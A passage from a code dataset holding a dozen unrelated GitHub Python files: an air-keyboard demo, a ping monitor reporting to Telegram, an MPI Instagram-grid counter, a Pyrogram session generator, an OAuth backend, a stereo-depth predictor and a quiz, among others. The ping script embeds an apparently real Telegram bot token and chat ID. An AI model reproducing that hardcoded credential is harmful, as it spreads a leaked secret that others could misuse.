fs.start(driver=\"pulseaudio\")\n sfid = fs.sfload(\"example.sf2\")\n fs.program_select(0, sfid, 0, 0)\n \n\n holding = False\n ret0 = ret1 = [0,0]\n margem = 0\n keyboard = np.zeros((1,1))\n key = Tecla()\n key2 = Tecla()\n cor = (255,0,128)\n cv.namedWindow('colmeia')\n cv.setMouseCallback('colmeia', desenhar)\n while True:\n img = get_video()\n depth = get_depth()\n if not holding:\n key.ret = [ret0,ret1]\n key.atualizaArea(depth)\n key.render()\n \n cv.imshow('colmeia', img)\n if key.apertou():\n fs.noteon(0, 60, 30)\n key.cor = (0,0,255)\n else:\n fs.noteoff(0,60)\n key.cor = (255,0,128)\n\n k = cv.waitKey(1)\n if k == 27:\n break\n fs.delete()\n cv.destroyAllWindows()","repo_name":"marcosoft47/opencv-tutorials","sub_path":"keyboardAnywhere/keyboardanywhere.py","file_name":"keyboardanywhere.py","file_ext":"py","file_size_in_byte":2878,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"20454907437","text":"import requests\nimport os\nimport time\nimport subprocess\nfrom subprocess import Popen, DEVNULL\nimport socket\nimport sys\nimport datetime\nfrom datetime import datetime\nfrom subprocess import call\n\ndef telegram_bot_sendtext(bot_message):\n \n bot_token = '1322504589:AAEggDtxjh7jKvayd1uYm3d5Zy9WRDXbKd8'\n bot_chatID = '1372613452'\n send_text = 'https://api.telegram.org/bot' + bot_token + '/sendMessage?chat_id=' + bot_chatID + '&parse_mode=Markdown&text=' + bot_message\n\n response = requests.get(send_text)\n\n return response.json()\n\n\n### running bash command \"date\" and then print it out -- РАБОТИ !\n#p = subprocess.Popen([\"date\"], shell=True, stdout=subprocess.PIPE)\n#stdout = p.communicate()\n# print(str(stdout))\n\n######## start ##########\n# to try readning the \"hosts\" from a file (it will be better, because of a easier modification of hosts. Let's try\n######## end ############\n\n############\n### testing 19.08.2020, I want to add \"ping\" command to test it and to send the result through the telegram bot... let's do it !\nhost = \"10.19.8.1\" \nping = subprocess.Popen(\n [\"ping\", \"-c\", \"4\", host],\n stdout = subprocess.PIPE,\n stderr = subprocess.PIPE\n)\n\nstdout, error = ping.communicate()\nprint(str(stdout))\n\ntest = telegram_bot_sendtext(str(stdout))\n\n\n###\nhost = \"10.19.8.5\" \nping = subprocess.Popen(\n [\"ping\", \"-c\", \"4\", host],\n stdout = subprocess.PIPE,\n stderr = subprocess.PIPE\n)\n\nstdout, error = ping.communicate()\nprint(str(stdout))\n\ntest = telegram_bot_sendtext(str(stdout))\n\n\n###\nhost = \"127.0.0.1\" \nping = subprocess.Popen(\n [\"ping\", \"-c\", \"4\", host],\n stdout = subprocess.PIPE,\n stderr = subprocess.PIPE\n)\n\nstdout, error = ping.communicate()\nprint(str(stdout))\n\n\n### redirect the command output to a file, using \"sys.stdout\" \nsys.stdout = open('ping-results.txt', 'a+')\nn = datetime.now()\nwith open(\"ping-results.txt\", \"a+\") as myfile:\n myfile.write(\"-------\\n\")\n myfile.write(\"%s\"%n)\n myfile.write(\"\\n\")\n myfile.write(\"-------\\n\")\nprint(str(stdout))\n\n### It works!\n#############\n\n### send message to the Telegram Bot, the output of \"date\" will be send, It needs to be \"str\", It cannot send \"tuple\"\ntest = telegram_bot_sendtext(str(stdout))\n\n# send a mail\nwith open('/home/mitaka/mail-script.sh', 'rb') as file:\n script = file.read()\nrc = call('/home/mitaka/mail-script.sh', shell=True)\n\n\n### If I want to send just a message\n#test = telegram_bot_sendtext('test,test,test,... my result is. test,test,test... my result is...')\n","repo_name":"pisarov/network-sciprts","sub_path":"telegram_message.py","file_name":"telegram_message.py","file_ext":"py","file_size_in_byte":2499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"22090209638","text":"from mpi4py import MPI \r\nimport json\r\nimport numpy as np\r\nimport re\r\n\r\ncomm = MPI.COMM_WORLD\r\nsize = comm.Get_size()\r\nrank = comm.Get_rank()\r\n\r\n# Here, we define some variables for all processors.\r\n# These counters are used to count post number for each processor.\r\ncount_post_per_box = {}\r\ncount_post_per_row = {}\r\ncount_post_per_column = {}\r\n\r\n#These variables are used by master node to sum up the post numbers.\r\nsum_post_for_box_per_pro = None\r\nsum_post_for_row_per_pro = None\r\nsum_post_for_column_per_pro = None\r\n\r\n#############------------------------------------------------Function Definition---------------------------------------------######################\r\n# I first define some functions which will be used next.\r\n# Get rid of all useless attributes in json object. Only the information of coordinates will be recorded\r\ndef get_filtered_data(json_obj):\r\n json_data = None\r\n \r\n if \"doc\" in json_obj:\r\n if \"coordinates\" in json_obj[\"doc\"]:\r\n if \"coordinates\" in json_obj[\"doc\"][\"coordinates\"]:\r\n json_data = {\"coordinates\": json_obj[\"doc\"][\"coordinates\"][\"coordinates\"]}\r\n\r\n return json_data\r\n\r\n# Check whether it is inside the whole range of interest\r\ndef check_whether_in_range(x_value, y_value, range_of_data):\r\n A1_xmin = range_of_data[0][0]\r\n A1_ymax = range_of_data[0][1]\r\n C4_xmax = range_of_data[1][0]\r\n C4_ymin = range_of_data[1][1]\r\n C3_xmin = range_of_data[2][0]\r\n C3_ymax = range_of_data[2][1]\r\n D5_xmax = range_of_data[3][0]\r\n D5_ymin = range_of_data[3][1]\r\n \r\n if x_value >= A1_xmin and x_value <= C4_xmax and y_value <= A1_ymax and y_value >= C4_ymin:\r\n return True\r\n elif x_value >= C3_xmin and x_value <= D5_xmax and y_value <= C3_ymax and y_value >= D5_ymin:\r\n return True\r\n else:\r\n return False\r\n\r\n# Check which box the coordinate pair belongs to\r\ndef get_box_id_for_json_object(x_value, y_value, range_of_each_box):\r\n\r\n #If the coordinates fall on the overlapped edge, it belongs to the biggest box_id of them. For example, if the point falls on the common edge of A1 and A2,\r\n #it belongs to A2. If the point falls on the center point of A1, A2, B1, B2, it belongs to B2.\r\n #Record all possible box_ids\r\n ids = []\r\n for box in range_of_each_box:\r\n if (x_value >= box[\"xmin\"] and x_value <= box[\"xmax\"] and y_value >= box[\"ymin\"] and y_value <= box[\"ymax\"]):\r\n ids.append(box[\"id\"])\r\n # Coordiantes on the overlapped edge belong to the last box_id\r\n # If it does not belong to any box, it will return None.\r\n try:\r\n return ids[-1]\r\n except IndexError:\r\n return None\r\n\r\n\r\n#############------------------------------------------------Master node's work---------------------------------------------######################\r\n# Master node reads 'melbgrid' file and broadcasts some range parameters so slavers don't have to open this file again\r\nif rank == 0:\r\n grid_filename = \"melbGrid.json\"\r\n \r\n # range_of_each box is used to record xmin, xmax, ymin, ymax of each box\r\n range_of_each_box = []\r\n\r\n with open(grid_filename, \"r\", encoding=\"utf-8\") as grid_file:\r\n whole_obj = json.load(grid_file)\r\n box_objs = whole_obj[\"features\"]\r\n\r\n for box_obj in box_objs:\r\n\r\n # Record each box's vertexes.\r\n range_of_box = {\"id\": box_obj[\"properties\"][\"id\"],\r\n \"xmin\": box_obj[\"properties\"][\"xmin\"],\r\n \"xmax\": box_obj[\"properties\"][\"xmax\"],\r\n \"ymin\": box_obj[\"properties\"][\"ymin\"],\r\n \"ymax\": box_obj[\"properties\"][\"ymax\"],\r\n }\r\n range_of_each_box.append(range_of_box)\r\n\r\n # Fetch the vertex coordinates of A1, C4, C3, D5 since the union of rectangle(A1, C4) and rectangle(C4, D5) defines the whole range of interest\r\n # These coordinates will be broadcast to all other processors\r\n if box_obj[\"properties\"][\"id\"] == \"A1\":\r\n A1_xmin = box_obj[\"properties\"][\"xmin\"]\r\n A1_ymax = box_obj[\"properties\"][\"ymax\"]\r\n elif box_obj[\"properties\"][\"id\"] == \"C4\":\r\n C4_xmax = box_obj[\"properties\"][\"xmax\"]\r\n C4_ymin = box_obj[\"properties\"][\"ymin\"]\r\n elif box_obj[\"properties\"][\"id\"] == \"C3\":\r\n C3_xmin = box_obj[\"properties\"][\"xmin\"]\r\n C3_ymax = box_obj[\"properties\"][\"ymax\"]\r\n elif box_obj[\"properties\"][\"id\"] == \"D5\":\r\n D5_xmax = box_obj[\"properties\"][\"xmax\"]\r\n D5_ymin = box_obj[\"properties\"][\"ymin\"]\r\n\r\n # Initialize the counter dictionaries for each processor to record the post number:\r\n # For example, post numbers will be recorded like {\"A1\":0, \"A2\":0, \"B1\":0....} in each processor\r\n if box_obj[\"properties\"][\"id\"] not in count_post_per_box:\r\n count_post_per_box[box_obj[\"properties\"][\"id\"]] = 0\r\n\r\n if box_obj[\"properties\"][\"id\"][0] not in count_post_per_row:\r\n count_post_per_row[box_obj[\"properties\"][\"id\"][0]] = 0\r\n\r\n if box_obj[\"properties\"][\"id\"][1] not in count_post_per_column:\r\n count_post_per_column[box_obj[\"properties\"][\"id\"][1]] = 0\r\n\r\n # Range_of_data is to define the peripheral border of the whole range.\r\n range_of_data = [(A1_xmin,A1_ymax),(C4_xmax,C4_ymin),(C3_xmin,C3_ymax),(D5_xmax,D5_ymin)]\r\n\r\n\r\nelse:\r\n range_of_data = None\r\n range_of_each_box = None\r\n count_post_per_box = None\r\n count_post_per_row = None\r\n count_post_per_column = None\r\n\r\n# Broadcast whole range of interest as well as range for each box \r\nrange_of_data = comm.bcast(range_of_data)\r\nrange_of_each_box = comm.bcast(range_of_each_box)\r\n\r\n# Broadcast dictionaries for processors to fill in. Dictionaries are initialized like this {\"A1\":0, \"A2\":0, \"B1\":0....}.\r\ncount_post_per_box = comm.bcast(count_post_per_box)\r\ncount_post_per_row = comm.bcast(count_post_per_row)\r\ncount_post_per_column = comm.bcast(count_post_per_column)\r\n\r\n\r\n#############------------------------------------------------Parallel Computing Starts Here---------------------------------------------######################\r\ndata_origin_filename = \"bigInstagram.json\"\r\n\r\n# Counter is used to record current line sequence number\r\ncounter = -1\r\n# First, collect all the data within the range and check which boxes they belong to\r\ndata_of_interest = []\r\n# Open the data file\r\nwith open(data_origin_filename, \"r\", encoding=\"utf-8\") as data_origin_file:\r\n # Read and process the file line by line except for the first line and last line\r\n for line in data_origin_file:\r\n counter += 1\r\n # Check if it is the first line, if so, skip it.\r\n if counter == 0:\r\n continue\r\n # Also check if it is the last line, if so, skip it. For tinyInstagram and mediumInstagram file, the last line starts with ']}'\r\n if re.match(r'^]}.*', line):\r\n break\r\n \r\n # Rank 0 processes line 0, rank 1 processes line 1, rank 2 processes line 2....\r\n if counter % size == rank:\r\n json_obj = {}\r\n\r\n #Last line of data ends with '}]}' in bigInstagram file\r\n if re.match(r'.*}]}$', line):\r\n json_obj = json.loads(line.strip()[:-2])\r\n \r\n #Last line of data ends with '}' in tinyInstagram & mediumInstagram file\r\n elif re.match(r'.*}$', line):\r\n json_obj = json.loads(line.strip())\r\n\r\n else:\r\n # For other lines, get rid of the ',' at the end of the line\r\n json_obj = json.loads(line.strip()[:-1])\r\n\r\n #Check if this json object has 'coordinates' key\r\n json_data = get_filtered_data(json_obj)\r\n if json_data != None:\r\n x = json_data[\"coordinates\"][1]\r\n y = json_data[\"coordinates\"][0]\r\n \r\n # Check if this json object inside the range of interest\r\n if x != None and y != None and check_whether_in_range(x,y,range_of_data):\r\n # Record the box_id for json object using dictionary\r\n box_id = get_box_id_for_json_object(x,y,range_of_each_box)\r\n if box_id != None:\r\n dict_new = {\"x_value\":x, \"y_value\":y, \"box_id\": box_id}\r\n data_of_interest.append(dict_new)\r\n\r\n# Second, each processor calculates post number for each box, row, column using the key \"box_id\"\r\nfor obj_of_interest in data_of_interest:\r\n count_post_per_box[obj_of_interest[\"box_id\"]] += 1\r\n count_post_per_row[obj_of_interest[\"box_id\"][0]] += 1\r\n count_post_per_column[obj_of_interest[\"box_id\"][1]] += 1\r\n\r\n\r\n# Gather the results from all processors to master node\r\nsum_post_for_box_per_pro = comm.gather(count_post_per_box,root = 0)\r\nsum_post_for_row_per_pro = comm.gather(count_post_per_row,root = 0)\r\nsum_post_for_column_per_pro = comm.gather(count_post_per_column, root = 0)\r\n\r\nif rank == 0:\r\n \r\n # Handle the lists collected from all processors. Master node sums them up for each row, column and box.\r\n sum_post_for_box={}\r\n sum_post_for_row={}\r\n sum_post_for_column={}\r\n \r\n for each_item in sum_post_for_box_per_pro:\r\n for each_box in each_item:\r\n if each_box not in sum_post_for_box:\r\n sum_post_for_box[each_box] = 0\r\n sum_post_for_box[each_box] += each_item[each_box]\r\n\r\n for key in sum_post_for_box:\r\n if key[0] not in sum_post_for_row:\r\n sum_post_for_row[key[0]] = 0\r\n sum_post_for_row[key[0]] += sum_post_for_box[key]\r\n\r\n for key in sum_post_for_box:\r\n if key[1] not in sum_post_for_column:\r\n sum_post_for_column[key[1]] = 0\r\n sum_post_for_column[key[1]] += sum_post_for_box[key]\r\n\r\n\r\n # Sort the results and generate output\r\n print(\"Order the grid box based on the number of posts in each box\")\r\n for post_pair in sorted(sum_post_for_box.items(), key = lambda x:x[1], reverse = True):\r\n print(post_pair[0] + \" : \" + str(post_pair[1]))\r\n\r\n print(\"\\nOrder the grid rows based on the number of posts in each row\")\r\n for post_pair in sorted(sum_post_for_row.items(), key = lambda x:x[1], reverse = True):\r\n print(post_pair[0] + \" : \" + str(post_pair[1]))\r\n\r\n print(\"\\nOrder the grid columns based on the number of posts in each column\")\r\n for post_pair in sorted(sum_post_for_column.items(), key = lambda x:x[1], reverse = True):\r\n print(post_pair[0] + \" : \" + str(post_pair[1]))\r\n\r\n","repo_name":"Serena-Chenzz/MPI_Programming","sub_path":"test_big.py","file_name":"test_big.py","file_ext":"py","file_size_in_byte":10652,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"23438058177","text":"from pyrogram import Client\nimport tgcrypto\n\nprint(\"\\n\\n • Program String Generator •\")\nprint(\"\\n\\n Enter Your Vail Details to Continue\")\n\n\nAPI_KEY = int(input(\"\\n\\nEnter API ID: \"))\nAPI_HASH = input(\"Enter API HASH: \")\nwith Client(':memory:', api_id=API_KEY, api_hash=API_HASH) as app:\n print(app.export_session_string())\n print(\"Your Pyrogram String Session Generated Successfully, Check Your Save Message -!\")\n session = app.export_session_string()\n a = app.send_message(\"me\", \"`{}`\".format(app.export_session_string()))\n app.send_message(\n chat_id=a.chat.id,\n text=\"**Here Is Your Pyrogram String Session, Don't Share Any Where -! \\n\\n © @kaalxsupport**\",\n reply_to_message_id=a.message_id)\n","repo_name":"kaal0408/Meow","sub_path":"session.py","file_name":"session.py","file_ext":"py","file_size_in_byte":736,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"81"} +{"seq_id":"23864479661","text":"from social.backends.oauth import BaseOAuth2\nfrom urllib import urlencode\nimport json\nimport sys\n\nfrom models import User, Hacker\n\nHACKER_ATTRIBUTES = ('avatar_url', 'twitter', 'github')\nUSER_FIELDS = ['username', 'email']\n\ndef find_legacy_user(strategy, uid, details, user=None, social=None, *args, **kwargs):\n # user is present if we're currently logged in (very unlikely given there's no\n # link to /login/hackerschool when you are logged in).\n #\n # social is present if we've already oauthed with hackerschool.com before.\n # If this is the case, we don't need to find the legacy user.\n # Social.pipeline.social_auth.social_user sets user from social.\n if user or social:\n return None\n\n # first try finding a legacy account by matching the email returned from\n # the API. This won't always work because people can change their emails on\n # hackerschool.com.\n users = User.objects.filter(email=details['email'])\n\n if users:\n return {'user': users[0]}\n\n # Fall back on matching by username. People can't change thier names on\n # hackerschool.com. We tried email first because email addresses are\n # globally unique, while it's possible that two people might have the same\n # name and thus username.\n users = User.objects.filter(username=details['username'])\n\n if users:\n return {'user': users[0]}\n\n # If we get down here, we're almost certainly dealing with a new uesr.\n # Social.pipeline.user.create_user will make a new user shortly after this.\n return None\n \ndef create_user(strategy, details, response, uid, user=None, *args, **kwargs):\n if user:\n return\n\n fields = dict((name, kwargs.get(name) or details.get(name)) \n for name in strategy.setting('USER_FIELDS',\n USER_FIELDS))\n # The new user ID should be the same as their ID on hackerschool.com\n fields['id'] = details.get(\"id\")\n \n if not fields:\n return\n\n return {\n 'is_new': True,\n 'user': strategy.create_user(**fields)\n }\n\ndef create_or_update_hacker(strategy, details, response, user, *args, **kwargs):\n if hasattr(user, 'hacker'):\n # If there's a hacker already, this is an existing user, and we'll\n # update the hacker.\n hacker = user.hacker\n else:\n # If there's no hacker, that means this is a new user. Let's make the\n # hacker.\n hacker = Hacker(user=user)\n\n changed = False\n\n for name, value in details.items():\n if name in HACKER_ATTRIBUTES:\n setattr(hacker, name, value)\n changed = True\n\n if changed:\n hacker.save()\n\nclass HackerSchoolOAuth2(BaseOAuth2):\n \"\"\"HackerSchool.com OAuth2 authentication backend\"\"\"\n name = 'hackerschool'\n HACKER_SCHOOL_ROOT = 'https://www.hackerschool.com'\n AUTHORIZATION_URL = HACKER_SCHOOL_ROOT + '/oauth/authorize'\n ACCESS_TOKEN_URL = HACKER_SCHOOL_ROOT + '/oauth/token'\n ACCESS_TOKEN_METHOD = 'POST'\n REFRESH_TOKEN_URL = ACCESS_TOKEN_URL\n SCOPE_SEPARATOR = ','\n EXTRA_DATA = [\n ('id', 'id'),\n ('expires', 'expires')\n ]\n\n def get_user_details(self, response):\n \"\"\"Return user details.\"\"\"\n first_name = response.get('first_name') or ''\n last_name = response.get('last_name') or ''\n username = first_name + last_name\n return {\n 'id': response.get('id'),\n 'email': response.get('email'),\n 'first_name': first_name,\n 'last_name': last_name,\n 'username': username,\n 'avatar_url': response.get('image'),\n 'twitter': response.get('twitter') or '',\n 'github': response.get('github') or '',\n }\n\n def get_user_id(self, details, response):\n \"\"\"Return a unique ID for the current user, by default from server\n response.\"\"\"\n return response.get('id')\n\n def user_data(self, access_token, *args, **kwargs):\n \"\"\"Loads user data.\"\"\"\n url = self.HACKER_SCHOOL_ROOT + '/api/v1/people/me?' + urlencode({\n 'access_token': access_token\n })\n try:\n request = self.request(url, method='GET')\n return request.json()\n except ValueError:\n return None\n","repo_name":"murphsp1/blaggregator","sub_path":"home/oauth.py","file_name":"oauth.py","file_ext":"py","file_size_in_byte":4392,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"32624446009","text":"import pyttsx3\n\n\nclass TTS:\n\n @staticmethod\n def play_system_voice_examples():\n tts = pyttsx3.init()\n tts.setProperty('rate', 150)\n\n voices = tts.getProperty('voices')\n print('Your system has {} voices installed. Playing examples ...'.format(len(voices)))\n\n for i in range(len(voices)):\n tts.setProperty('voice', voices[i].id)\n tts.say('This is an English example of your system\\'s voice with the id {}'.format(i))\n tts.runAndWait()\n tts.say('Das ist ein deutsches Beispiel der Systemstimme mit der ID {}'.format(i))\n tts.runAndWait()\n\n print('Finished playing examples. Enter the desired voice\\'s id in your configuration file.')\n\n def __init__(self, voice_id: int, words_per_minute: int):\n self.tts = pyttsx3.init()\n self.tts.setProperty('voice', self.tts.getProperty('voices')[voice_id].id)\n self.tts.setProperty('rate', words_per_minute)\n\n def say(self, text: str):\n self.tts.say(text)\n self.tts.runAndWait()\n","repo_name":"codeneobee/concourse-blame","sub_path":"concourse_blame/tts.py","file_name":"tts.py","file_ext":"py","file_size_in_byte":1057,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"17331244469","text":"import concurrent.futures\n\nfrom itertools import repeat\n\nfrom rich.progress import Progress\n\nimport requests\n\nfrom pypackage.util.progress_manager import ProgressManager\n\nclass PooledDownloader:\n def __init__(self, progressManager: ProgressManager, workers: int = 4, chunksize: int = 512):\n self.progressManager = progressManager\n self.chunksize = chunksize\n self.pool = concurrent.futures.ThreadPoolExecutor(max_workers = workers)\n\n def _downloadUrlToPath(self, label: str, url: str, path: str) -> str: \n request = requests.get(url, stream = True)\n if \"Content-Length\" in request.headers:\n total = int(request.headers[\"Content-Length\"])\n else:\n total = 0\n task = self.progressManager.addTask(label, total) if total > 2**20 else None\n with open(path, \"wb\") as file:\n for chunk in request.iter_content(self.chunksize):\n file.write(chunk)\n if task:\n self.progressManager.updateTask(task, self.chunksize)\n if task:\n self.progressManager.finishTask(task)\n return path\n\n def downloadUrlToPath(self, url: str, path: str, label: str) -> concurrent.futures.Future:\n return self.pool.submit(self._downloadUrlToPath, label, url, path)\n\n def __enter__(self):\n self.progressManager.start()\n return self\n def __exit__(self, excType, excVal, excTb):\n self.progressManager.finish()\n self.pool.shutdown(wait = True, cancel_futures = True)","repo_name":"GingerIndustries/pypackage","sub_path":"pypackage/util/pooled_downloader.py","file_name":"pooled_downloader.py","file_ext":"py","file_size_in_byte":1535,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"81"} +{"seq_id":"17547006593","text":"from __future__ import annotations\nfrom typing import List, Dict, Set, Any, Iterable\n\nimport os\nimport pickle\nimport json\nfrom contextlib import contextmanager\n\n\ndef create_dir_if_not_exists(path: str) -> None:\n if not os.path.exists(path):\n os.makedirs(path, exist_ok=True) \n\n\ndef open_line_by_line_txt_file(\n file_dir: str, \n mode: str = \"r\", \n as_set: bool = False \n) -> List | Set:\n \"\"\"\n \"\"\"\n if file_dir.endswith('.txt'):\n with open(file_dir, mode) as f:\n txt = [line.strip(\"\\n\") for line in f]\n if as_set:\n return set(txt)\n return txt\n\n\ndef open_json_as_dict(file_dir: str) -> Dict[str, Any]:\n \"\"\"\n \"\"\"\n if file_dir.endswith('.json'):\n with open(file_dir) as f:\n return json.load(f)\n\n\ndef persist_iterable_as_txtfile(data: Iterable, file_dir: str) -> None:\n \"\"\"\n \"\"\"\n with open(file_dir, 'w') as file:\n for item in data:\n file.write(str(item) + '\\n')\n\ndef persist_dict_as_json(\n file: Dict[str, Any], \n mode: str,\n file_dir: str,\n) -> None:\n \"\"\"\n \"\"\"\n with open(file_dir, mode) as f:\n json.dump(file, f, indent=4)\n \n\ndef persist_data_with_pickle(\n file_to_persist: Any, \n mode: str,\n file_dir: str\n) -> None:\n \"\"\"\n \"\"\"\n with open(file_dir, mode) as f:\n pickle.dump(file_to_persist, f)\n \n\ndef load_data_with_pickle(\n mode: str,\n file_dir: str\n) -> None:\n \"\"\"\n \"\"\"\n return pickle.load(open(file_dir, mode))\n\n\ndef check_if_dir_extension_is(to_check: str, dir_path: str) -> bool:\n if dir_path is None:\n return\n extension = os.path.splitext(dir_path)[1].lower()\n if extension in to_check:\n return True\n else:\n return False\n \ndef lazy_writer(file_path: str, sep: str =\"\\n\") -> None:\n \"\"\"\n A function that lazily writes strings to a text file.\n\n It uses the internal function '_lazy_write' to handle file opening and \n closing. It also uses a yield construct to allow data to bewritten to\n the file lazily.\n\n The function is initialized using the following code:\n\n writer = lazy_writer(file_path)\n next(writer)\n\n and allows strings to be added using a call to sent():\n\n writer.send(str_obj)\n\n Args:\n file_path: The path where the text strings will be stored.\n sep: Text separator.\n \"\"\"\n @contextmanager\n def _lazy_write(file_path=file_path):\n try:\n with open(file_path, \"w\") as f:\n try:\n yield f\n finally:\n f.flush()\n except FileNotFoundError as e:\n raise e\n \n with _lazy_write(file_path) as f:\n while True:\n text = yield\n f.write(text + sep)\n\n","repo_name":"julchia/pypipe-preprocessing-tool","sub_path":"pypipe/core/processes/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2805,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"4242242561","text":"from __future__ import print_function, division\nimport os\nimport argparse\nimport torch.nn as nn\nfrom skimage import io\nimport matplotlib.pyplot as plt\nimport torch.backends.cudnn as cudnn\nfrom torch.utils.data import DataLoader\nfrom datasets import __datasets__\nfrom models import __models__\nfrom utils import *\nfrom utils.KittiColormap import *\nfrom datasets.data_prepare import dataprepare\nimport time\n\n\ncudnn.benchmark = True\n\nparser = argparse.ArgumentParser(description='ASNet')\nparser.add_argument('--model', default='ASNet', help='select a model structure', choices=__models__.keys())\nparser.add_argument('--maxdepth', type=int, default=10, help='maximum depth')\nparser.add_argument('--dataset', help='dataset name', choices=__datasets__.keys())\nparser.add_argument('--datasplit', help='data spilt',type=int, default=1)\nparser.add_argument('--datafilename', help='data file name',type=str, default='event7.aedat4')\nparser.add_argument('--datapath', required=True, help='data path')\nparser.add_argument('--testlist', required=True, help='testing list')\nparser.add_argument('--loadckpt', required=True, help='load the weights from a specific checkpoint')\n\n\n# parse arguments\nargs = parser.parse_args()\n\n# dataset, dataloader\nStereoDataset = __datasets__[args.dataset]\n\n\nif(args.dataset == 'mvsec'):\n if not os.path.exists('./datasets/prepare.txt'):\n dataprepare(args.dataset,args.datapath)\n test_dataset = StereoDataset(args.datasplit,args.datapath, args.testlist, False)\n \nelse:\n if not os.path.exists('./datasets/prepare4.txt'):\n dataprepare(args.dataset,args.datapath+'/'+args.datafilename)\n test_dataset = StereoDataset(args.datafilename,args.datapath, args.testlist, False)\n\n \nTestImgLoader = DataLoader(test_dataset, 1, shuffle=False, num_workers=4, drop_last=True)\n\n\n\n# model, optimizer\nmodel = __models__[args.model](args.maxdepth)\nmodel = nn.DataParallel(model)\nmodel.cuda()\n\n# load parameters\nprint(\"Loading model {}\".format(args.loadckpt))\nstate_dict = torch.load(args.loadckpt)\nmodel.load_state_dict(state_dict['model'])\n\n\ndef test(args):\n print(\"Generating the disparity maps...\")\n\n os.makedirs('./predictions', exist_ok=True)\n \n start=time.time()\n\n for batch_idx, sample in enumerate(TestImgLoader):\n \n\n disp_est_tn = test_sample(sample)\n disp_est_np = tensor2numpy(disp_est_tn)\n disp_est_np = np.array([disp_est_np])\n top_pad_np = tensor2numpy(sample[\"top_pad\"])\n right_pad_np = tensor2numpy(sample[\"right_pad\"])\n left_filenames = sample[\"left_filename\"]\n\n \n\n \n\n for disp_est, top_pad, right_pad, fn in zip(disp_est_np, top_pad_np, right_pad_np, left_filenames):\n\n \n disp_est = disp_est[0]\n assert len(disp_est.shape) == 2\n\n disp_est = np.array(disp_est[top_pad:, :-right_pad], dtype=np.float32)\n name = fn.split('/')\n fnplt = os.path.join(\"predictions\", 'plt_'+name[-1])\n fnplt = fnplt.replace('pfm','jpg')\n\n fn = os.path.join(\"predictions\", name[-1])\n\n \n\n\n\n\n print(fn)\n cv2.imwrite(fn, disp_est)\n plt.imsave(fnplt, disp_est)\n\n \n \n end =time.time()\n \n\n print(\"Done!\")\n print(\"time:\",end-start)\n\ndef save_txt(path,data):\n\twith open(path, 'w') as outfile:\n\t\tfor slice_2d in data:\n\t\t\tnp.savetxt(outfile, slice_2d, fmt = '%f', delimiter = ',')\n\n\n@make_nograd_func\ndef test_sample(sample):\n model.eval()\n disp_ests = model(sample['left'].cuda(), sample['right'].cuda())\n return disp_ests[-1]\n\nDISPARITY_MULTIPLIER = 7.0\nFOCAL_LENGTH_X_BASELINE = {\n 'indoor_flying': 19.941772,\n}\n\ndef depth_to_disparity(depth_maps):\n \"\"\"\n Conversion from depth to disparity used in the paper \"Learning an event sequence embedding for dense event-based\n deep stereo\" (ICCV 2019)\n\n Original code available at https://github.com/tlkvstepan/event_stereo_ICCV2019\n \"\"\"\n disparity_maps = DISPARITY_MULTIPLIER * FOCAL_LENGTH_X_BASELINE['indoor_flying'] / (depth_maps + 1e-15)\n return disparity_maps\n\n\ndef disparity_to_depth(disparity_map):\n depth_map = DISPARITY_MULTIPLIER * FOCAL_LENGTH_X_BASELINE['indoor_flying'] / (disparity_map + 1e-7)\n return depth_map\n\n\nif __name__ == '__main__':\n test(args)\n","repo_name":"Huobozun/ASNet","sub_path":"prediction.py","file_name":"prediction.py","file_ext":"py","file_size_in_byte":4321,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"72324128584","text":"# multiplication_quiz.py - A program that asks a number of multiplication\n# questions with a timer and allows 3 tries. There are 10 questions for\n# each quiz.\n\nimport random\nimport time\nimport sys\n\nprint(\"\"\"\\n----------------------------------------------------------------------\nAttention! This quiz gives you a 10-second time-limit for each\nquestion. If you exceed it, your attempt will be considered wrong.\nAlso, you get 3 tries for each question. Good luck!\n----------------------------------------------------------------------\"\"\")\n\nstart_game = input(\"\\nWould you like to start? (yes/no): \").lower().strip()\nif start_game != \"yes\" and start_game != 'y':\n sys.exit() # Exit quiz if user does not choose 'yes'/'y'\n\nnumber_of_questions = 10 # Number of questions to be given\ncorrect_answers = 0 # Used to display user score at the end of quiz\n\nfor question_number in range(number_of_questions):\n tries = 0\n num1 = random.randint(0, 24)\n num2 = random.randint(0, 24)\n\n while tries < 3:\n print(f\"\\n{question_number + 1}) What is {num1} x {num2}?\")\n start = time.monotonic()\n response = int(input(\"Answer: \"))\n end = time.monotonic()\n\n time_elapsed = end - start\n\n if time_elapsed > 10:\n print(\"Exceeded 10 second limit. No point awarded.\")\n print(f\"The correct answer is {num1 * num2}.\")\n time.sleep(2)\n break\n\n if response == num1 * num2:\n print(\"Correct!\")\n correct_answers += 1\n time.sleep(2)\n break\n\n elif response != num1 * num2:\n tries += 1\n if tries == 3:\n print(\"Incorrect. You reached 3 tries. No point awarded.\")\n print(f\"The correct answer is {num1 * num2}.\")\n time.sleep(2)\n break\n\n print(f\"Incorrect. Try again. You have {3 - tries} tries left.\")\n time.sleep(2)\n continue\n\nprint(f\"\\nYour score is {correct_answers}/{number_of_questions}.\")\n\n# Personalised messages for a certain score out of 10.\nif correct_answers == 0:\n print(\"You are possibly the dumbest person alive.\")\nelif 0 < correct_answers <= 3:\n print(\"You got a lot of practicing to do.\")\nelif 3 < correct_answers <= 6:\n print(\"Not bad I guess. Still can do better.\")\nelif 6 < correct_answers <= 8:\n print(\"That's quite good!\")\nelif correct_answers == 9:\n print(\"Almost had it! That's a wonderful mark.\")\nelse:\n 